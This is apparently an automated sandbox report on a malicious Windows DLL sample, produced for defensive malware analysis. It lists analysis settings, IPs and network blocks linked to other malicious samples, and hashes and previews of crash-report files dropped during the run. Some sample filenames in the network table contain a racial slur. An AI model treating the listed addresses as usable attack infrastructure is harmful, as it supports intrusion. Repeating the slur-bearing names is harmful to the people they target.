Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	6zAcNlJXo7 (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.evad.winDLL@32/14@0/30
EGA Information:	Failed
HDC Information:	Successful, ratio: 15.4% (good quality ratio 14.5%) Quality average: 75.1% Quality standard deviation: 26.2%
HCA Information:	Successful, ratio: 68% Number of executed functions: 31 Number of non-executed functions: 169
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 52.182.143.212 Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, client.wns.windows.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, watson.telemetry.microsoft.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:49:37	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
195.154.133.20	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	SCAN_35292280954166786.xlsm	Get hash	malicious	Browse
	U4pi8WRxNJ.dll	Get hash	malicious	Browse
	oERkAQeB4d.dll	Get hash	malicious	Browse
	FC9fpZrma1.dll	Get hash	malicious	Browse
	Z4HpRSQD6I.dll	Get hash	malicious	Browse
	uLCt7sc5se.dll	Get hash	malicious	Browse
	rGF1Xgw9Il.dll	Get hash	malicious	Browse
	nBtjFS1D08.dll	Get hash	malicious	Browse
	q8HPR8Yypk.dll	Get hash	malicious	Browse
212.237.17.99	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	mal.dll	Get hash	malicious	Browse
	mal2.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse
	9sQccNfqAR.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	t3XtgyQEoe.dll	Get hash	malicious	Browse
	SCAN_35292280954166786.xlsm	Get hash	malicious	Browse
	U4pi8WRxNJ.dll	Get hash	malicious	Browse
	oERkAQeB4d.dll	Get hash	malicious	Browse
	FC9fpZrma1.dll	Get hash	malicious	Browse
	Z4HpRSQD6I.dll	Get hash	malicious	Browse
	uLCt7sc5se.dll	Get hash	malicious	Browse
	rGF1Xgw9Il.dll	Get hash	malicious	Browse
	nBtjFS1D08.dll	Get hash	malicious	Browse
	q8HPR8Yypk.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ARUBA-ASNIT	DHL DOCUMENT FOR #504.exe	Get hash	malicious	Browse	62.149.128.40
	RqgAGRvHNwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	RqgAGRvHNwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	dFUOuTxFQrXAwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	RbrKCqqjDPUwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	dFUOuTxFQrXAwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	RbrKCqqjDPUwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	mal.dll	Get hash	malicious	Browse	212.237.56.116
	mal2.dll	Get hash	malicious	Browse	212.237.56.116
	mal.dll	Get hash	malicious	Browse	212.237.56.116
	GYRxsMXKtvwSwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	KsXtuXmxoZvgudVwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	xTpcaEZvwmHqwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	mal2.dll	Get hash	malicious	Browse	212.237.56.116
	GYRxsMXKtvwSwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	KsXtuXmxoZvgudVwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	xTpcaEZvwmHqwhoreniggagay.dll	Get hash	malicious	Browse	94.177.217.88
	invoice template 33142738819.docx	Get hash	malicious	Browse	94.177.217.88
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	212.237.56.116
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	212.237.56.116
OnlineSASFR	mal.dll	Get hash	malicious	Browse	195.154.133.20
	mal2.dll	Get hash	malicious	Browse	195.154.133.20
	mal.dll	Get hash	malicious	Browse	195.154.133.20
	mal2.dll	Get hash	malicious	Browse	195.154.133.20
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	195.154.133.20
	2gyA5uNl6VPQUA.dll	Get hash	malicious	Browse	195.154.133.20
	spZRMihlrkFGqYq1f.dll	Get hash	malicious	Browse	195.154.146.35
	spZRMihlrkFGqYq1f.dll	Get hash	malicious	Browse	195.154.146.35
	AtlanticareINV25-67431254.htm	Get hash	malicious	Browse	51.15.17.195
	9sQccNfqAR.dll	Get hash	malicious	Browse	195.154.133.20
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse	195.154.133.20
	9sQccNfqAR.dll	Get hash	malicious	Browse	195.154.133.20
	t3XtgyQEoe.dll	Get hash	malicious	Browse	195.154.133.20
	t3XtgyQEoe.dll	Get hash	malicious	Browse	195.154.133.20
	67MPsax8fd.exe	Get hash	malicious	Browse	163.172.208.8
	Linux_x86	Get hash	malicious	Browse	212.83.174.79
	184285013-044310-Factura pendiente (2).exe	Get hash	malicious	Browse	212.83.130.20
	MTjXit7IJn	Get hash	malicious	Browse	51.158.219.54
	SCAN_35292280954166786.xlsm	Get hash	malicious	Browse	195.154.133.20
	gvtdsqavfej.dll	Get hash	malicious	Browse	195.154.146.35

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_8c5962cbbdb13a8671f1f3c3793157e73bd5d897_d70d8aa6_108aca62\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6753013994270348
Encrypted:	false
SSDEEP:	96:7v0oRgZqyDy9hkoyt7JfapXIQcQ5c6A2cE2cw33+a+z+HbHgbEVG4rmMOyWZAXGT:onBSHnM28jjKfq/u7snS274ItW
MD5:	A04197D8171DB35605555768A51CE760
SHA1:	9E69A23ECBE745613436AABE071D6FFE7B5B1009
SHA-256:	40E5391063796C6232D0B738EEC994D9D385C45A554F38FD4E68AE7AB6CF8DB5
SHA-512:	D6D0DFD7D0FD812987E71DF25D98700734B90D454F9DDDCC6402AC303773631A829242D639991BB6457652C5EC48532D05C347356113466C92C044F34A015C85
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.9.4.1.5.8.3.5.6.2.0.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.5.f.a.d.8.9.-.e.a.6.c.-.4.c.6.0.-.9.a.9.4.-.4.6.a.e.2.8.9.3.0.0.2.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.b.d.0.3.1.2.-.a.3.6.4.-.4.c.c.b.-.a.2.5.4.-.7.e.8.7.2.9.c.f.f.f.e.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.f.8.-.0.0.0.1.-.0.0.1.c.-.f.a.6.f.-.7.2.9.4.3.7.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d71d33d652a62c864cb684e881f783bcee8c2df7_d70d8aa6_0ac3046d\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6791738172948202
Encrypted:	false
SSDEEP:	96:v4F/nRRgZqy1y9hk1Dg3fWpXIQcQmc6W6hcEPcw3f+a+z+HbHgbEVG4rmMOyWZA6:AdnCBVH45FLjKfq/u7snS274ItW
MD5:	2EDD6CFCCA5567F4DAF7568B3A611460
SHA1:	428380B6711881E57504013CA111133A801FBEFA
SHA-256:	E7C7F843273CB0EEFFDEA280155FF63D9642BFFB29C841E83692644CC22E12A9
SHA-512:	51B1A6032A9854FBAC7645547390CFD8C14FB02EE8D7788B2A0E4C92CAB62216FDA983EFBF9F1839E27AF786F60238DDBC522C98C9A3039DB54C497BC95000B4
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.9.4.1.6.7.2.6.8.7.7.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.8.9.4.1.7.5.7.6.8.7.3.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.6.1.8.1.2.3.-.1.f.b.2.-.4.c.8.e.-.b.0.3.c.-.c.2.b.c.a.7.5.1.7.d.d.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.4.a.9.6.a.8.-.8.1.8.c.-.4.d.7.8.-.a.9.c.a.-.6.3.9.5.d.f.7.d.8.c.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.f.8.-.0.0.0.1.-.0.0.1.c.-.f.a.6.f.-.7.2.9.4.3.7.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F19.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	51788
Entropy (8bit):	3.080081923801942
Encrypted:	false
SSDEEP:	1536:u+Hx0zJNqjV8P+RnQd0FeWNik9TzuBV4t+5ylSjaFP1vL0Z6y8nlP98cufm:u+Hx0zJNqjV8P+RnQd0Fe6ik9TzuBV41
MD5:	9A4DBB47295518EE4D393F88424041FC
SHA1:	F0F8C8449E588ECFBDC5F024C6F76663E8A83429
SHA-256:	687E9AF350F22D9DF3E10DB9986D51D08E95E838F5AF88F6B388AF08E135ED9B
SHA-512:	072D69A12C12F16F994B13A9E0AC297882096FD2F102B126118850422A5539C844EA6ADAE51B2E01438B329D58210B525A8C5C7C82AEDD9CE203B1CD645C85EA
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3534.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6949640027342316
Encrypted:	false
SSDEEP:	96:9GiZYWBbIG2dY+Y4dWI7HrUYEZGKtk0iUOVj4VwSlPQa8cUrlRo9I6h3:9jZDOp15LZUSa8cU5RoC6h3
MD5:	F65DE600063E97CDD599CD2CFB2F8273
SHA1:	8694016237B85B60D705CC24C4CA5CF959FD460C
SHA-256:	D94A0392D96A6C0275FCC302399155680441C2F163920E7F99A8EEA53129266D
SHA-512:	D2F80A72CC082D92CAF875A01C9DB5C01799C4DF14BBA22FC42E7F50BD816418FE8C9294FEC29B3A435B3152A7B77CD3209E8BAC111B2EEBD9600436A0D628B7
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER64A2.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	51408
Entropy (8bit):	3.0808206673061047
Encrypted:	false
SSDEEP:	1536:OjHz0NRRNxJzsFQ+HPXn2sYd6cUib5T/NVVptP0yeTl6B94oeqnyMhl6dF7q:OjHz0NRRNxJzsFQ+HPXn2sYd6Fib5T/t
MD5:	C2B998504BF85E9484A10E370E9B9DC8
SHA1:	BF52B033A37AE019F62E6170AD44F218766AB395
SHA-256:	94C5E2905D9F8C1CC1DD9C0922C0F42941CEEBFD9B3459E8557C5CF49A54B620
SHA-512:	CEC2F4E2636511C5F9C1A1D5B262EBB4E4DB6DDEF3C4DA1A18C875136506883D117E13FADDB41F199223DBD55B3120F3470DE2A4140AC7F7F20A9832C9027DA2
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER68BA.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6950402063171075
Encrypted:	false
SSDEEP:	96:9GiZYWbgvdYaaYRYFWIBMHtUYEZ5DItk0ioOQ4DwL+ea0QWyjoQIOy3:9jZDb7mcBhDcRa0QWyjonOy3
MD5:	B22D566D42CDEBEF28E25F164671622A
SHA1:	104BBE3CB4B5D6C14181C60418B522DEB3C86A16
SHA-256:	5E0370AFD624E8F88CA7E4B0D1A171399212EC6BEE68D34C57FD4D6C9926DC84
SHA-512:	D65DF634FCCC1F3E57B8AB0D162E337523B3DAD7BC6B7ADC84EA460551413BE0EE49A946A167DDEC2AF6750A5B3A9DE5C332D4516C8CADD399811349C06B199C
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBAC2.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Dec 2 04:49:19 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	26336
Entropy (8bit):	2.515829097380295
Encrypted:	false
SSDEEP:	192:0ubyVdiGCkOlrqHNmuUSf65+dLm8JpmBhJnPObbyuuqS8Hrmew:ob4lrqLaKmVnPsbyuuqk9
MD5:	56B3C85DBF7845346109FF161270FF5C
SHA1:	F14E90E6F207D64A69824A124F982E6685F361C9
SHA-256:	23AE9A861AA5D6C87B35C6B1B3D67E8B90072D9D464A7D8732B007ABF898062F
SHA-512:	F2A95F07430CA1ECE95C5699A2E69F4D5494E4E05DA43CCC8200478B9EDF07BEA7B50E9B57B64FA7B95BD635840813BB8BA5BA9DF30CA9DE32D74774A531D0E7
Malicious:	false
Preview:	MDMP....... .......OP.a............4...............H.......$...........................`.......8...........T...........h...xZ...........................................................................................U...........B......p.......GenuineIntelW...........T............O.a5............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFE3.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8342
Entropy (8bit):	3.6996052692968955
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiYs6WBXF6YFKSUGp+gmfsSzRCpBI89brYsfpZm:RrlsNij6a6YISUGggmfsSzerLfG
MD5:	258B4B551ED9B8BD517B2A00864D0FD5
SHA1:	14093629D217375354BBD062667E3EA234728568
SHA-256:	22DDA5F6440A81183E660AC7EFF995AD5754D9D4313549B04EC7C50D655F280C
SHA-512:	9B4589560F94F24159E9FFA5E2E8FE167DE6737B7A6C3279ED70E872EAFD51638ED42DFA84CEAA4928639CF9EDD489DC913AD2EFABB1AA6560FC587654911249
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.0.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC265.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4598
Entropy (8bit):	4.477906873124645
Encrypted:	false
SSDEEP:	48:cvIwSD8zsGJgtWI95lWSC8B68fm8M4J2yzZFV+q84WvtKcQIcQwQUd:uITfc2USNlJJRgtKkwQUd
MD5:	66815A17FF61A397001E78C0174C0FBC
SHA1:	47A94A29B19B6CFB7F3A6DA71B1B59AA43D446CA
SHA-256:	DFA32D0F7898E6C0297C32D2701D524935161FBFC0A90B297BFB724026A028B3
SHA-512:	71114D2584D13E43C8A87D9294FCF83C35143A51BF501FF5530341CBF5119E7F42023F6B10CF7719B1AFA18147B143261E9188CC09BFD29D8D3210578602F794
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279559" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD8C.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Dec 2 04:49:28 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	1059352
Entropy (8bit):	1.3588583314157108
Encrypted:	false
SSDEEP:	1536:lSuZlIU8Sb8oZl4pr/pjQasKJpY5g3o60obdMOQeub+JTUq:wOl7+x/53d/S2bdMOQBq
